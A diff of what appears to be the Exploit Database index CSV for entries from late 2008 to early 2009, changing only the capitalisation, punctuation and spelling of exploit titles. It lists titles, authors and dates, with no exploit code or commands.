7566,platforms/windows/remote/7566.html,"Google Chrome Browser - (ChromeHTML://) Remote Parameter Injection",2008-12-23,Nine:Situations:Group,windows,remote,0 @@ -7119,22 +7120,22 @@ id,file,description,date,author,platform,type,port 7575,platforms/php/webapps/7575.pl,"Joomla Component 5starhotels - 'id' SQL Injection",2008-12-24,EcHoLL,php,webapps,0 7576,platforms/php/webapps/7576.pl,"PHP-Fusion 7.0.2 - Blind SQL Injection",2008-12-24,StAkeR,php,webapps,0 7577,platforms/windows/local/7577.pl,"Acoustica Mixcraft 4.2 - Universal Stack Overflow (SEH)",2008-12-24,SkD,windows,local,0 -7578,platforms/windows/dos/7578.pl,"SAWStudio 3.9i - (.prf) Local Buffer Overflow (PoC)",2008-12-24,"Encrypt3d.M!nd ",windows,dos,0 +7578,platforms/windows/dos/7578.pl,"SAWStudio 3.9i - '.prf' Local Buffer Overflow (PoC)",2008-12-24,"Encrypt3d.M!nd ",windows,dos,0 7579,platforms/php/webapps/7579.txt,"ClaSS 0.8.60 - (export.php ftype) Local File Inclusion",2008-12-24,fuzion,php,webapps,0 -7580,platforms/php/webapps/7580.txt,"BloofoxCMS 0.3.4 - (lang) Local File Inclusion",2008-12-24,fuzion,php,webapps,0 -7581,platforms/freebsd/local/7581.c,"FreeBSD 6x/7 - protosw kernel Local Privledge Escalation Exploit",2008-12-28,"Don Bailey",freebsd,local,0 +7580,platforms/php/webapps/7580.txt,"BloofoxCMS 0.3.4 - 'lang' Local File Inclusion",2008-12-24,fuzion,php,webapps,0 +7581,platforms/freebsd/local/7581.c,"FreeBSD 6x/7 - protosw kernel Local Privilege Escalation Exploit",2008-12-28,"Don Bailey",freebsd,local,0 7582,platforms/windows/local/7582.py,"IntelliTamper 2.07/2.08 - '.map' Local SEH Overwrite",2008-12-28,Cnaph,windows,local,0 7583,platforms/windows/remote/7583.pl,"Microsoft Internet Explorer - XML Parsing Buffer Overflow",2008-12-28,"Jeremy Brown",windows,remote,0 7584,platforms/windows/remote/7584.pl,"Amaya Web Browser 11.0.1 - Remote Buffer Overflow (Windows Vista)",2008-12-28,SkD,windows,remote,0 7585,platforms/windows/dos/7585.txt,"Microsoft Windows Media Player - '.wav' Remote Crash (PoC)",2008-12-28,"laurent gaffié ",windows,dos,0 7586,platforms/php/webapps/7586.txt,"Miniweb 2.0 - (Authentication Bypass) SQL Injection",2008-12-28,bizzit,php,webapps,0 7587,platforms/php/webapps/7587.txt,"Joomla Component PAX Gallery 0.1 - Blind SQL Injection",2008-12-28,XaDoS,php,webapps,0 -7589,platforms/windows/dos/7589.pl,"BulletProof FTP Client - (.bps) Local Stack Overflow (PoC)",2008-12-28,Stack,windows,dos,0 +7589,platforms/windows/dos/7589.pl,"BulletProof FTP Client - '.bps' Local Stack Overflow (PoC)",2008-12-28,Stack,windows,dos,0 7592,platforms/windows/dos/7592.pl,"Hex Workshop 5.1.4 - Color Mapping File Local Buffer Overflow (PoC)",2008-12-28,"Encrypt3d.M!nd ",windows,dos,0 7593,platforms/php/webapps/7593.pl,"DeluxeBB 1.2 - Blind SQL Injection",2008-12-28,StAkeR,php,webapps,0 7594,platforms/windows/remote/7594.html,"Chilkat FTP - ActiveX (SaveLastError) Insecure Method Exploit",2008-12-28,callAX,windows,remote,0 7595,platforms/php/webapps/7595.txt,"FubarForum 1.6 - Arbitrary Authentication Bypass",2008-12-28,k3yv4n,php,webapps,0 -7596,platforms/php/webapps/7596.txt,"AlstraSoft Web Email Script Enterprise - 'id' SQL Injection",2008-12-28,Bgh7,php,webapps,0 +7596,platforms/php/webapps/7596.txt,"Alstrasoft Web Email Script Enterprise - 'id' SQL Injection",2008-12-28,Bgh7,php,webapps,0 7597,platforms/php/webapps/7597.txt,"OwenPoll 1.0 - Insecure Cookie Handling",2008-12-28,Osirys,php,webapps,0 7598,platforms/php/webapps/7598.txt,"PHP-Fusion Mod TI - 'id' SQL Injection",2008-12-28,"Khashayar Fereidani",php,webapps,0 7599,platforms/asp/webapps/7599.txt,"ForumApp 3.3 - Remote Database Disclosure",2008-12-28,Cyber.Zer0,asp,webapps,0 @@ -7172,7 +7173,7 @@ id,file,description,date,author,platform,type,port 7631,platforms/php/webapps/7631.txt,"2Capsule - 'sticker.php id' SQL Injection",2009-01-01,Zenith,php,webapps,0 7632,platforms/hardware/dos/7632.txt,"Nokia S60 SMS/MMS (Curse of Silence) - Denial of Service",2009-01-01,"Tobias Engel",hardware,dos,0 7633,platforms/php/webapps/7633.txt,"EggBlog 3.1.10 - Change Admin Pass Cross-Site Request Forgery",2009-01-01,x0r,php,webapps,0 -7634,platforms/windows/dos/7634.pl,"Audacity 1.2.6 - (.gro) Local Buffer Overflow (PoC)",2009-01-01,Houssamix,windows,dos,0 +7634,platforms/windows/dos/7634.pl,"Audacity 1.2.6 - '.gro' Local Buffer Overflow (PoC)",2009-01-01,Houssamix,windows,dos,0 7635,platforms/php/webapps/7635.txt,"ASPThai.Net WebBoard 6.0 - (bview.asp) SQL Injection",2009-01-01,DaiMon,php,webapps,0 7636,platforms/php/webapps/7636.pl,"PHPFootball 1.6 - (filter.php) Remote Hash Disclosure Exploit",2009-01-01,KinG-LioN,php,webapps,0 7637,platforms/windows/dos/7637.pl,"Elecard MPEG Player 5.5 - '.m3u' Stack Buffer Overflow (PoC)",2009-01-01,"aBo MoHaMeD",windows,dos,0 @@ -7196,7 +7197,7 @@ id,file,description,date,author,platform,type,port 7655,platforms/windows/local/7655.pl,"Destiny Media Player 1.61 - '.lst' Local Buffer Overflow (2)",2009-01-04,sCORPINo,windows,local,0 7656,platforms/windows/local/7656.pl,"Destiny Media Player 1.61 - '.lst' Local Buffer Overflow (3)",2009-01-04,Houssamix,windows,local,0 7657,platforms/php/webapps/7657.txt,"webSPELL 4.01.02 - 'id' Remote Edit Topics",2009-01-04,StAkeR,php,webapps,0 -7658,platforms/php/webapps/7658.pl,"PNphpBB2 <= 12i - (ModName) Multiple Local File Inclusion Exploit",2009-01-04,StAkeR,php,webapps,0 +7658,platforms/php/webapps/7658.pl,"PNphpBB2 <= 12i - (ModName) Multiple Local File Inclusion",2009-01-04,StAkeR,php,webapps,0 7659,platforms/php/webapps/7659.txt,"WSN Guest 1.23 - (search) SQL Injection",2009-01-04,DaiMon,php,webapps,0 7660,platforms/php/webapps/7660.txt,"PHPMesFilms 1.0 - (index.php id) SQL Injection",2009-01-04,SuB-ZeRo,php,webapps,0 7661,platforms/windows/local/7661.pl,"Destiny Media Player 1.61 - '.lst' Local Buffer Overflow (4)",2009-01-04,Stack,windows,local,0 @@ -7206,12 +7207,12 @@ id,file,description,date,author,platform,type,port 7665,platforms/asp/webapps/7665.txt,"Ayemsis Emlak Pro - 'acc.mdb' Database Disclosure",2009-01-05,ByALBAYX,asp,webapps,0 7666,platforms/asp/webapps/7666.txt,"Ayemsis Emlak Pro - (Authentication Bypass) SQL Injection",2009-01-05,ByALBAYX,asp,webapps,0 7667,platforms/php/webapps/7667.txt,"Joomla Component simple_review 1.x - SQL Injection",2009-01-05,EcHoLL,php,webapps,0 -7668,platforms/php/webapps/7668.pl,"Cybershade CMS 0.2b - 'index.php' Remote File Inclusion Exploit",2009-01-05,JosS,php,webapps,0 +7668,platforms/php/webapps/7668.pl,"Cybershade CMS 0.2b - 'index.php' Remote File Inclusion",2009-01-05,JosS,php,webapps,0 7669,platforms/php/webapps/7669.pl,"Joomla com_na_newsdescription - (newsid) SQL Injection",2009-01-05,EcHoLL,php,webapps,0 7670,platforms/php/webapps/7670.pl,"Joomla com_phocadocumentation - 'id' SQL Injection",2009-01-05,EcHoLL,php,webapps,0 7671,platforms/windows/local/7671.pl,"VUPlayer 2.49 - '.wax' Local Buffer Overflow",2009-01-05,Houssamix,windows,local,0 7672,platforms/php/webapps/7672.txt,"phpauctionsystem - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-01-05,x0r,php,webapps,0 -7673,platforms/multiple/dos/7673.html,"Safari - (Arguments) Array Integer Overflow PoC (New Heap Spray)",2009-01-05,Skylined,multiple,dos,0 +7673,platforms/multiple/dos/7673.html,"Safari - 'ARGUMENTS' Array Integer Overflow PoC (New Heap Spray)",2009-01-05,Skylined,multiple,dos,0 7674,platforms/php/webapps/7674.txt,"PHPAuctionSystem - Insecure Cookie Handling",2009-01-05,ZoRLu,php,webapps,0 7675,platforms/multiple/local/7675.txt,"Oracle 10g - SYS.LT.REMOVEWORKSPACE SQL Injection",2009-01-06,sh2kerr,multiple,local,0 7676,platforms/multiple/local/7676.txt,"Oracle 10g - SYS.LT.MERGEWORKSPACE SQL Injection",2009-01-06,sh2kerr,multiple,local,0 @@ -7221,7 +7222,7 @@ id,file,description,date,author,platform,type,port 7680,platforms/php/webapps/7680.txt,"ezpack 4.2b2 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-01-06,!-BUGJACK-!,php,webapps,0 7681,platforms/linux/local/7681.txt,"Debian GNU/Linux XTERM - (DECRQSS/comments)",2009-01-06,"Paul Szabo",linux,local,0 7682,platforms/php/webapps/7682.txt,"RiotPix 0.61 - (Authentication Bypass) SQL Injection",2009-01-06,ZoRLu,php,webapps,0 -7683,platforms/php/webapps/7683.pl,"Goople 1.8.2 - (frontpage.php) Blind SQL Injection",2009-01-06,darkjoker,php,webapps,0 +7683,platforms/php/webapps/7683.pl,"Goople 1.8.2 - (FrontPage.php) Blind SQL Injection",2009-01-06,darkjoker,php,webapps,0 7684,platforms/windows/local/7684.pl,"Rosoft Media Player 4.2.1 - Local Buffer Overflow",2009-01-06,"Encrypt3d.M!nd ",windows,local,0 7685,platforms/multiple/dos/7685.pl,"SeaMonkey 1.1.14 - (marquee) Denial of Service",2009-01-06,StAkeR,multiple,dos,0 7686,platforms/php/webapps/7686.txt,"ItCMS 2.1a - (Authentication Bypass) SQL Injection",2009-01-06,certaindeath,php,webapps,0 @@ -7243,14 +7244,14 @@ id,file,description,date,author,platform,type,port 7702,platforms/windows/local/7702.c,"GOM Player 2.0.12.3375 - '.asx' Stack Overflow",2009-01-08,DATA_SNIPER,windows,local,0 7703,platforms/php/webapps/7703.txt,"PHP-Fusion Mod vArcade 1.8 - (comment_id) SQL Injection",2009-01-08,"Khashayar Fereidani",php,webapps,0 7704,platforms/php/webapps/7704.pl,"Pizzis CMS 1.5.1 - (visualizza.php idvar) Blind SQL Injection",2009-01-08,darkjoker,php,webapps,0 -7705,platforms/php/webapps/7705.pl,"XOOPS 2.3.2 - (mydirname) Remote PHP Code Execution Exploit",2009-01-08,StAkeR,php,webapps,0 +7705,platforms/php/webapps/7705.pl,"XOOPS 2.3.2 - (mydirname) Remote PHP Code Execution",2009-01-08,StAkeR,php,webapps,0 7706,platforms/windows/remote/7706.mrc,"Anope IRC Services With bs_fantasy_ext 1.2.0-RC1 - mIRC script",2009-01-08,Phil,windows,remote,0 7707,platforms/windows/local/7707.py,"IntelliTamper (2.07/2.08) - Language Catalog SEH Overflow",2009-01-08,Cnaph,windows,local,0 -7708,platforms/windows/dos/7708.pl,"MP3 TrackMaker 1.5 - (.mp3) Local Heap Overflow (PoC)",2009-01-09,Houssamix,windows,dos,0 +7708,platforms/windows/dos/7708.pl,"MP3 TrackMaker 1.5 - '.mp3' Local Heap Overflow (PoC)",2009-01-09,Houssamix,windows,dos,0 7709,platforms/windows/dos/7709.pl,"VUPlayer 2.49 - '.asx' (HREF) Local Buffer Overflow (PoC)",2009-01-09,"aBo MoHaMeD",windows,dos,0 7710,platforms/windows/dos/7710.html,"Microsoft Internet Explorer - JavaScript screen[ ] Denial of Service",2009-01-09,Skylined,windows,dos,0 7711,platforms/php/webapps/7711.txt,"Fast FAQs System - (Authentication Bypass) SQL Injection",2009-01-09,x0r,php,webapps,0 -7712,platforms/hardware/remote/7712.txt,"Netgear WG102 - Leaks SNMP write password with read access",2009-01-09,"Harm S.I. Vaittes",hardware,remote,0 +7712,platforms/hardware/remote/7712.txt,"Netgear WG102 - Leaks SNMP write Password with read access",2009-01-09,"Harm S.I. Vaittes",hardware,remote,0 7713,platforms/windows/local/7713.pl,"VUPlayer 2.49 - '.asx' (HREF) Local Buffer Overflow (2)",2009-01-09,Houssamix,windows,local,0 7714,platforms/windows/local/7714.pl,"VUPlayer 2.49 - '.asx' (HREF) Local Buffer Overflow (1)",2009-01-11,sCORPINo,windows,local,0 7715,platforms/windows/local/7715.py,"VUPlayer 2.49 - '.asx' (HREF) Universal Buffer Overflow",2009-01-11,His0k4,windows,local,0 @@ -7258,8 +7259,8 @@ id,file,description,date,author,platform,type,port 7717,platforms/php/webapps/7717.pl,"Joomla com_jashowcase - 'catid' SQL Injection",2009-01-11,EcHoLL,php,webapps,0 7718,platforms/php/webapps/7718.txt,"Joomla com_newsflash - 'id' SQL Injection",2009-01-11,EcHoLL,php,webapps,0 7719,platforms/php/webapps/7719.txt,"Fast Guest Book - (Authentication Bypass) SQL Injection",2009-01-11,Moudi,php,webapps,0 -7720,platforms/windows/dos/7720.pl,"Microsoft Windows - (.CHM) Denial of Service (html compiled)",2009-01-11,securfrog,windows,dos,0 -7721,platforms/windows/dos/7721.pl,"Browse3D 3.5 - (.sfs) Local Buffer Overflow (PoC)",2009-01-11,Houssamix,windows,dos,0 +7720,platforms/windows/dos/7720.pl,"Microsoft Windows - '.chm' Denial of Service (HTML compiled)",2009-01-11,securfrog,windows,dos,0 +7721,platforms/windows/dos/7721.pl,"Browse3D 3.5 - '.sfs' Local Buffer Overflow (PoC)",2009-01-11,Houssamix,windows,dos,0 7722,platforms/php/webapps/7722.txt,"DZcms 3.1 - (products.php pcat) SQL Injection",2009-01-11,"Glafkos Charalambous ",php,webapps,0 7723,platforms/php/webapps/7723.txt,"Seo4SMF for SMF forums - Multiple Vulnerabilities",2009-01-11,WHK,php,webapps,0 7724,platforms/php/webapps/7724.php,"phpMDJ 1.0.3 - (id_animateur) Blind SQL Injection",2009-01-11,darkjoker,php,webapps,0 @@ -7271,18 +7272,18 @@ id,file,description,date,author,platform,type,port 7730,platforms/php/webapps/7730.txt,"Social Engine - 'browse_classifieds.php s' SQL Injection",2009-01-11,snakespc,php,webapps,0 7731,platforms/php/webapps/7731.txt,"fttss 2.0 - Remote Command Execution",2009-01-11,dun,php,webapps,0 7732,platforms/php/webapps/7732.php,"Silentum Uploader 1.4.0 - Remote File Deletion Exploit",2009-01-11,"Danny Moules",php,webapps,0 -7733,platforms/php/webapps/7733.txt,"Photobase 1.2 - (language) Local File Inclusion",2009-01-11,Osirys,php,webapps,0 +7733,platforms/php/webapps/7733.txt,"Photobase 1.2 - 'Language' Local File Inclusion",2009-01-11,Osirys,php,webapps,0 7734,platforms/php/webapps/7734.txt,"Joomla Component Portfol - (vcatid) SQL Injection",2009-01-12,H!tm@N,php,webapps,0 7735,platforms/php/webapps/7735.pl,"Simple Machines Forum 1.0.13 / 1.1.5 - 'Destroyer 0.1' Password Reset Security Bypass",2009-01-12,Xianur0,php,webapps,0 7736,platforms/asp/webapps/7736.htm,"Comersus Shopping Cart 6.0 - Remote User Pass Exploit",2009-01-12,ajann,asp,webapps,0 7737,platforms/windows/dos/7737.py,"Triologic Media Player 7 - '.m3u' Local Heap Buffer Overflow (PoC)",2009-01-12,zAx,windows,dos,0 -7738,platforms/php/webapps/7738.txt,"Wordpress Plugin WP-Forum 1.7.8 - SQL Injection",2009-01-12,seomafia,php,webapps,0 +7738,platforms/php/webapps/7738.txt,"WordPress Plugin WP-Forum 1.7.8 - SQL Injection",2009-01-12,seomafia,php,webapps,0 7739,platforms/windows/remote/7739.html,"ExcelOCX ActiveX 3.2 - Download File Insecure Method Exploit",2009-01-12,"Alfons Luja",windows,remote,0 7740,platforms/php/webapps/7740.txt,"PWP Wiki Processor 1-5-1 - Remote File Upload",2009-01-12,ahmadbady,php,webapps,0 7741,platforms/asp/webapps/7741.txt,"dMx READY (25 - Products) Remote Database Disclosure",2009-01-12,Cyber-Zone,asp,webapps,0 7742,platforms/windows/dos/7742.txt,"Winamp 5.541 - '.mp3'/'.aiff' Multiple Denial of Services",2009-01-12,securfrog,windows,dos,0 7743,platforms/php/webapps/7743.txt,"Realtor 747 - 'define.php INC_DIR' Remote File Inclusion",2009-01-12,ahmadbady,php,webapps,0 -7744,platforms/asp/webapps/7744.txt,"Virtual GuestBook 2.1 - Remote Database Disclosure",2009-01-13,Moudi,asp,webapps,0 +7744,platforms/asp/webapps/7744.txt,"Virtual Guestbook 2.1 - Remote Database Disclosure",2009-01-13,Moudi,asp,webapps,0 7745,platforms/windows/local/7745.py,"VUPlayer 2.49 - '.asx' (Universal) Local Buffer Overflow",2009-01-13,"Encrypt3d.M!nd ",windows,local,0 7746,platforms/php/webapps/7746.txt,"Joomla Component com_gigcal (gigcal_gigs_id) 1.0 - SQL Injection",2009-01-13,boom3rang,php,webapps,0 7747,platforms/windows/remote/7747.html,"Word Viewer OCX 3.2 - ActiveX (Save) Remote File Overwrite",2009-01-13,Houssamix,windows,remote,0 @@ -7303,7 +7304,7 @@ id,file,description,date,author,platform,type,port 7762,platforms/windows/remote/7762.html,"EDraw Office Viewer 5.4 - HttpDownloadFile() Insecure Method",2009-01-14,Cyber-Zone,windows,remote,0 7763,platforms/windows/remote/7763.html,"Excel Viewer OCX 3.2 - Remote Command Execution Exploit",2009-01-14,Stack,windows,remote,0 7764,platforms/php/webapps/7764.txt,"DMXReady Blog Manager 1.1 - Remote File Delete",2009-01-14,ajann,php,webapps,0 -7765,platforms/windows/local/7765.py,"OTSTurntables 1.00.027 - '.ofl' Local Stack Overflow",2009-01-14,suN8Hclf,windows,local,0 +7765,platforms/windows/local/7765.py,"OtsTurntables 1.00.027 - '.ofl' Local Stack Overflow",2009-01-14,suN8Hclf,windows,local,0 7766,platforms/asp/webapps/7766.txt,"DMXReady Catalog Manager 1.1 - Remote Contents Change",2009-01-14,ajann,asp,webapps,0 7767,platforms/asp/webapps/7767.txt,"DMXReady Classified Listings Manager 1.1 - SQL Injection",2009-01-14,ajann,asp,webapps,0 7768,platforms/asp/webapps/7768.txt,"DMXReady Contact Us Manager 1.1 - Remote Contents Change",2009-01-14,ajann,asp,webapps,0 @@ -7350,7 +7351,7 @@ id,file,description,date,author,platform,type,port 7810,platforms/php/webapps/7810.txt,"Aj Classifieds Personals 3.0 - Arbitrary File Upload",2009-01-16,ZoRLu,php,webapps,0 7811,platforms/php/webapps/7811.txt,"Aj Classifieds For Sale 3.0 - Arbitrary File Upload",2009-01-16,ZoRLu,php,webapps,0 7812,platforms/multiple/dos/7812.pl,"MPlayer 1.0rc2 - TwinVQ Stack Buffer Overflow (PoC)",2009-01-16,sCORPINo,multiple,dos,0 -7813,platforms/php/webapps/7813.txt,"Simple PHP Newsletter 1.5 - (olang) Local File Inclusion",2009-01-16,ahmadbady,php,webapps,0 +7813,platforms/php/webapps/7813.txt,"Simple PHP NewsLetter 1.5 - (olang) Local File Inclusion",2009-01-16,ahmadbady,php,webapps,0 7814,platforms/php/webapps/7814.txt,"BibCiter 1.4 - Multiple SQL Injections",2009-01-16,nuclear,php,webapps,0 7815,platforms/php/webapps/7815.txt,"Joomla Component Gigcal 1.x - 'id' SQL Injection",2009-01-18,Lanti-Net,php,webapps,0 7816,platforms/asp/webapps/7816.txt,"DS-IPN.NET Digital Sales IPN - Database Disclosure",2009-01-18,Moudi,asp,webapps,0 @@ -7379,12 +7380,12 @@ id,file,description,date,author,platform,type,port 7840,platforms/php/webapps/7840.pl,"Joomla Com BazaarBuilder Shopping Cart 5.0 - SQL Injection",2009-01-21,XaDoS,php,webapps,0 7841,platforms/php/webapps/7841.txt,"Mambo Component SOBI2 RC 2.8.2 - (bid) SQL Injection",2009-01-21,"Br1ght D@rk",php,webapps,0 7842,platforms/windows/remote/7842.html,"Firefox 3.0.5 - Status Bar Obfuscation / Clickjacking",2009-01-21,MrDoug,windows,remote,0 -7843,platforms/windows/local/7843.c,"Browser3D 3.5 - (.sfs) Local Stack Overflow (C)",2009-01-22,SimO-s0fT,windows,local,0 +7843,platforms/windows/local/7843.c,"Browser3D 3.5 - '.sfs' Local Stack Overflow (C)",2009-01-22,SimO-s0fT,windows,local,0 7844,platforms/php/webapps/7844.py,"Sad Raven's Click Counter 1.0 - passwd.dat Disclosure Exploit",2009-01-21,Pouya_Server,php,webapps,0 7845,platforms/hardware/remote/7845.txt,"AXIS 70U - Network Document Server Privilege Escalation / Cross-Site Scripting",2009-01-21,DSecRG,hardware,remote,0 7846,platforms/php/webapps/7846.php,"Joomla com_pcchess - (game_id) Blind SQL Injection",2009-01-21,InjEctOr5,php,webapps,0 7847,platforms/php/webapps/7847.txt,"Joomla Component beamospetition 1.0.12 - SQL Injection / Cross-Site Scripting",2009-01-21,vds_s,php,webapps,0 -7848,platforms/windows/local/7848.pl,"Browser3D 3.5 - (.sfs) Local Stack Overflow (Perl)",2009-01-22,AlpHaNiX,windows,local,0 +7848,platforms/windows/local/7848.pl,"Browser3D 3.5 - '.sfs' Local Stack Overflow (Perl)",2009-01-22,AlpHaNiX,windows,local,0 7849,platforms/php/webapps/7849.txt,"OwnRS Blog 1.2 - (autor.php) SQL Injection",2009-01-22,nuclear,php,webapps,0 7850,platforms/asp/webapps/7850.txt,"asp-project 1.0 - Insecure Cookie Method",2009-01-22,"Khashayar Fereidani",asp,webapps,0 7851,platforms/php/webapps/7851.php,"Pardal CMS 0.2.0 - Blind SQL Injection",2009-01-22,darkjoker,php,webapps,0 @@ -7393,14 +7394,14 @@ id,file,description,date,author,platform,type,port 7854,platforms/windows/dos/7854.pl,"MediaMonkey 3.0.6 - '.m3u' Local Buffer Overflow (PoC)",2009-01-25,AlpHaNiX,windows,dos,0 7855,platforms/linux/local/7855.txt,"PostgreSQL 8.2/8.3/8.4 - UDF for Command Execution",2009-01-25,"Bernardo Damele",linux,local,0 7856,platforms/linux/local/7856.txt,"MySQL 4/5/6 - UDF for Command Execution",2009-01-25,"Bernardo Damele",linux,local,0 -7857,platforms/windows/dos/7857.pl,"Merak Media Player 3.2 - .m3u file Local Buffer Overflow (PoC)",2009-01-25,Houssamix,windows,dos,0 +7857,platforms/windows/dos/7857.pl,"Merak Media Player 3.2 - '.m3u' File Local Buffer Overflow (PoC)",2009-01-25,Houssamix,windows,dos,0 7858,platforms/hardware/remote/7858.php,"Siemens ADSL SL2-141 - Cross-Site Request Forgery Exploit",2009-01-25,spdr,hardware,remote,0 -7859,platforms/php/webapps/7859.pl,"MemHT Portal 4.0.1 - (avatar) Remote Code Execution Exploit",2009-01-25,StAkeR,php,webapps,0 +7859,platforms/php/webapps/7859.pl,"MemHT Portal 4.0.1 - (avatar) Remote Code Execution",2009-01-25,StAkeR,php,webapps,0 7860,platforms/php/webapps/7860.php,"Mambo com_sim 0.8 - Blind SQL Injection",2009-01-25,"Mehmet Ince",php,webapps,0 7861,platforms/asp/webapps/7861.txt,"Web-Calendar Lite 1.0 - (Authentication Bypass) SQL Injection",2009-01-25,ByALBAYX,asp,webapps,0 7862,platforms/php/webapps/7862.txt,"Flax Article Manager 1.1 - 'cat_id' SQL Injection",2009-01-25,JIKO,php,webapps,0 7863,platforms/php/webapps/7863.txt,"OpenGoo 1.1 - (script_class) Local File Inclusion",2009-01-25,fuzion,php,webapps,0 -7864,platforms/php/webapps/7864.py,"EPOLL SYSTEM 3.1 - (password.dat) Disclosure Exploit",2009-01-25,Pouya_Server,php,webapps,0 +7864,platforms/php/webapps/7864.py,"EPOLL SYSTEM 3.1 - (Password.dat) Disclosure Exploit",2009-01-25,Pouya_Server,php,webapps,0 7865,platforms/solaris/dos/7865.c,"SunOS Release 5.11 snv_101b - Remote IPv6 Crash Exploit",2009-01-26,kingcope,solaris,dos,0 7866,platforms/php/webapps/7866.txt,"Simple Machines Forum 1.1.7 - Cross-Site Request Forgery / Cross-Site Scripting / Package Upload",2009-01-26,Xianur0,php,webapps,0 7867,platforms/php/webapps/7867.php,"ITLPoll 2.7 Stable2 - (index.php id) Blind SQL Injection",2009-01-26,fuzion,php,webapps,0 @@ -7410,11 +7411,11 @@ id,file,description,date,author,platform,type,port 7872,platforms/asp/webapps/7872.txt,"E-ShopSystem - (Authentication Bypass / SQL Injection) Multiple Vulnerabilities",2009-01-26,InjEctOr5,asp,webapps,0 7873,platforms/php/webapps/7873.txt,"Script Toko Online 5.01 - (shop_display_products.php) SQL Injection",2009-01-26,k1n9k0ng,php,webapps,0 7874,platforms/php/webapps/7874.txt,"SHOP-INET 4 - 'show_cat2.php grid' SQL Injection",2009-01-26,FeDeReR,php,webapps,0 -7875,platforms/windows/remote/7875.pl,"WinFTP 2.3.0 - (LIST) Post-Authenticated Remote Buffer Overflow",2009-01-26,"joe walko",windows,remote,21 -7876,platforms/php/webapps/7876.php,"PHP-CMS 1 - (username) Blind SQL Injection",2009-01-26,darkjoker,php,webapps,0 +7875,platforms/windows/remote/7875.pl,"WinFTP 2.3.0 - 'LIST' Post-Authentication Remote Buffer Overflow",2009-01-26,"joe walko",windows,remote,21 +7876,platforms/php/webapps/7876.php,"PHP-CMS 1 - 'username' Blind SQL Injection",2009-01-26,darkjoker,php,webapps,0 7877,platforms/php/webapps/7877.txt,"Wazzum Dating Software - (userid) SQL Injection",2009-01-26,nuclear,php,webapps,0 -7878,platforms/php/webapps/7878.txt,"Groone's GLink Organizer - 'index.php cat' SQL Injection",2009-01-26,nuclear,php,webapps,0 -7879,platforms/php/webapps/7879.pl,"SiteXS 0.1.1 - (type) Local File Inclusion Exploit",2009-01-26,darkjoker,php,webapps,0 +7878,platforms/php/webapps/7878.txt,"Groone's GLink ORGanizer - 'index.php cat' SQL Injection",2009-01-26,nuclear,php,webapps,0 +7879,platforms/php/webapps/7879.pl,"SiteXS 0.1.1 - (type) Local File Inclusion",2009-01-26,darkjoker,php,webapps,0 7880,platforms/php/webapps/7880.txt,"ClickAuction - (Authentication Bypass) SQL Injection",2009-01-26,R3d-D3V!L,php,webapps,0 7881,platforms/php/webapps/7881.txt,"Joomla com_flashmagazinedeluxe - (mag_id) SQL Injection",2009-01-26,TurkGuvenligi,php,webapps,0 7882,platforms/windows/dos/7882.html,"NCTVideoStudio ActiveX DLLs 1.6 - Remote Heap Overflow (PoC)",2009-01-26,Stack,windows,dos,0 @@ -7425,30 +7426,30 @@ id,file,description,date,author,platform,type,port 7887,platforms/windows/dos/7887.pl,"Zinf Audio Player 2.2.1 - '.pls' Stack Overflow (PoC)",2009-01-27,Hakxer,windows,dos,0 7888,platforms/windows/local/7888.pl,"Zinf Audio Player 2.2.1 - '.pls' Local Buffer Overflow (Universal)",2009-01-28,Houssamix,windows,local,0 7889,platforms/windows/dos/7889.pl,"Zinf Audio Player 2.2.1 - '.m3u' Local Heap Overflow (PoC)",2009-01-27,Hakxer,windows,dos,0 -7890,platforms/windows/dos/7890.pl,"Zinf Audio Player 2.2.1 - (.gqmpeg) Buffer Overflow (PoC)",2009-01-27,Hakxer,windows,dos,0 +7890,platforms/windows/dos/7890.pl,"Zinf Audio Player 2.2.1 - '.gqmpeg' Buffer Overflow (PoC)",2009-01-27,Hakxer,windows,dos,0 7892,platforms/php/webapps/7892.php,"Community CMS 0.4 - (/index.php id) Blind SQL Injection",2009-01-28,darkjoker,php,webapps,0 7893,platforms/php/webapps/7893.txt,"gamescript 4.6 - (Cross-Site Scripting / SQL Injection / Local File Inclusion) Multiple Vulnerabilities",2009-01-28,"Encrypt3d.M!nd ",php,webapps,0 7894,platforms/php/webapps/7894.txt,"Chipmunk Blog - (Authentication Bypass) Add Admin Exploit",2009-01-28,x0r,php,webapps,0 -7895,platforms/php/webapps/7895.txt,"Gazelle CMS - (template) Local File Inclusion",2009-01-28,fuzion,php,webapps,0 +7895,platforms/php/webapps/7895.txt,"Gazelle CMS - 'template' Local File Inclusion",2009-01-28,fuzion,php,webapps,0 7896,platforms/php/webapps/7896.php,"Lore 1.5.6 - 'article.php' Blind SQL Injection",2009-01-28,OzX,php,webapps,0 -7897,platforms/php/webapps/7897.php,"phpList 2.10.x - (Remote Code Execution by environ inclusion) Local File Inclusion Exploit",2009-01-28,mozi,php,webapps,0 +7897,platforms/php/webapps/7897.php,"phpList 2.10.x - (Remote Code Execution by environ Inclusion) Local File Inclusion",2009-01-28,mozi,php,webapps,0 7898,platforms/php/webapps/7898.txt,"Max.Blog 1.0.6 - (submit_post.php) SQL Injection",2009-01-28,"Salvatore Fresta",php,webapps,0 7899,platforms/php/webapps/7899.txt,"Max.Blog 1.0.6 - (offline_auth.php) Offline Authentication Bypass",2009-01-28,"Salvatore Fresta",php,webapps,0 7900,platforms/php/webapps/7900.txt,"Social Engine - (category_id) SQL Injection",2009-01-28,snakespc,php,webapps,0 7901,platforms/php/webapps/7901.py,"SmartSiteCMS 1.0 - (articles.php var) Blind SQL Injection",2009-01-28,certaindeath,php,webapps,0 7902,platforms/windows/dos/7902.txt,"Amaya Web Editor - XML and HTML parser Vulnerabilities",2009-01-28,"Core Security",windows,dos,0 -7903,platforms/windows/remote/7903.html,"Google Chrome 1.0.154.43 - ClickJacking",2009-01-28,x0x,windows,remote,0 +7903,platforms/windows/remote/7903.html,"Google Chrome 1.0.154.43 - Clickjacking",2009-01-28,x0x,windows,remote,0 7904,platforms/windows/dos/7904.pl,"Thomson mp3PRO Player/Encoder - '.m3u' Crash (PoC)",2009-01-29,Hakxer,windows,dos,0 7905,platforms/php/webapps/7905.pl,"Personal Site Manager 0.3 - Remote Command Execution Exploit",2009-01-29,darkjoker,php,webapps,0 7906,platforms/windows/dos/7906.pl,"Amaya Web Editor 11.0 - Remote Buffer Overflow (PoC)",2009-01-29,Stack,windows,dos,0 7908,platforms/php/webapps/7908.txt,"Star Articles 6.0 - (admin.manage) Remote Contents Change",2009-01-29,ByALBAYX,php,webapps,0 